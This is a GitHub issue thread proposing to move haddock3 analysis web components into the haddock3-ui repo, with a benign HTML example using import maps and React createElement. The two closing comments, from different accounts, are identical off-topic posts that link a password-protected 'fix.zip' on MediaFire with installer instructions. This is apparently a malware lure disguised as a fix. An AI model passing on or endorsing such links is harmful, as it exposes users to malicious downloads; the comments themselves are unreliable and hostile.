### ISSUE TITLE
Merge into haddock3-ui

### ISSUE THREAD

**Issue by sverhoeven** [i-VRESSE/haddock3-analysis-components#17]
The components in this repo are use on the haddock3 cli and webapp.
The haddock3 webapp has reusable components in https://github.com/i-VRESSE/haddock3-ui 
The haddock3-ui repo has more features like docs and taillwind.

It would be nice to have less repos. We should move the components of this repo into haddock3-ui repo.

In the haddock3 cli we could use something like

```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8" />
    <title>Analysis web component</title>
  </head>
  <body>
    <div id="root"></div>
    <script type="importmap">
      {
        "imports": {
          "react": "https://esm.sh/react",
          "react-dom": "https://esm.sh/react-dom"
        }
      }
    </script>
    <script type="module">
      import { createRoot } from "react-dom";
      import { createElement } from "react";
      import { LinkToFile } from 'https://esm.sh/@i-vresse/haddock3-ui/dist/LinkToFile.js';

      const file = new File(["Hello, world!"], "hello-world.txt", {
        type: "text/plain",
      });
      
      // <LinkToFile file={file}>A link to a text file with hello world.</LinkToFile> 
      createRoot(document.getElementById("root")).render(
        createElement(LinkToFile, { file }, 'A link to a text file with hello world.')
      );
    </script>
  </body>
</html>
```
- by using deep import we only get deps we need
- we should also import any css files for a component if it has any
- by using createElement no jsx is needed

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
